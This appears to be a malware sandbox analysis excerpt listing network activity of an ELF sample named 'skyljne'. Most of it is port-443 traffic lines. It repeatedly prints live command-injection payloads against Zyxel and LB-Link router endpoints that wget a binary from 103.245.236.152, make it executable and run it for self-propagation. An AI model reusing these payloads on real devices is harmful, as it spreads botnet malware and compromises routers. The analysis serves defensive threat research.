            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: unknownDNS traffic detected: queries for: haha.skyljne.click
            Source: unknownHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 14 Jan 2024 17:44:14 GMTServer: Boa/0.94.14rc21Accept-Ranges: bytesConnection: closeContent-Type: text/html; charset=ISO-8859-1Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 67 6f 66 6f 72 6d 2f 73 65 74 5f 4c 69 6d 69 74 43 6c 69 65 6e 74 5f 63 66 67 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /goform/set_LimitClient_cfg was not found on this server.</BODY></HTML>
            Source: skyljne.mpsl.elfString found in binary or memory: http://103.245.236.152/skyljne.mips;$
            Source: skyljne.mpsl.elfString found in binary or memory: http://103.245.236.152/skyljne.mpsl;
            Source: skyljne.mpsl.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: skyljne.mpsl.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
            Source: unknownNetwork traffic detected: HTTP traffic on port 57084 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39648 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47270 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40650 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35298 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60266 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54802 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45088 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36154 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60242 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37480 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35274 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57096 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40662 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60278 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52608 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54814 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37010 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53958 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45076 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47282 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59290 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35262 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53934 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41816
            Source: unknownNetwork traffic detected: HTTP traffic on port 40674 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41818
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41812
            Source: unknownNetwork traffic detected: HTTP traffic on port 49426 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41814
            Source: unknownNetwork traffic detected: HTTP traffic on port 36166 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49438 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41810
            Source: unknownNetwork traffic detected: HTTP traffic on port 60230 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41938 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41804
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41800
            Source: unknownNetwork traffic detected: HTTP traffic on port 37022 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41802
            Source: unknownNetwork traffic detected: HTTP traffic on port 53946 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37034 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40686 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39600 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59216 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37492 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34394 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36178 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35250 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56180 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41530 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40216 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41926 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53848
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53846
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53840
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38210
            Source: unknownNetwork traffic detected: HTTP traffic on port 38744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41914 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38212
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38214
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53844
            Source: unknownNetwork traffic detected: HTTP traffic on port 48186 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53842
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38216
            Source: unknownNetwork traffic detected: HTTP traffic on port 48558 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38206
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38208
            Source: unknownNetwork traffic detected: HTTP traffic on port 37046 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38372 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41856
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41852
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41854
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41850
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53856
            Source: unknownNetwork traffic detected: HTTP traffic on port 37058 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53850
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38200
            Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53854
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38202
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53852
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38204
            Source: unknownNetwork traffic detected: HTTP traffic on port 53910 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41848
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41844
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41846
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41840
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41842
            Source: unknownNetwork traffic detected: HTTP traffic on port 52200 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44196 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51208
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53868
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51206
            Source: unknownNetwork traffic detected: HTTP traffic on port 38360 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58348 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42410 -> 443
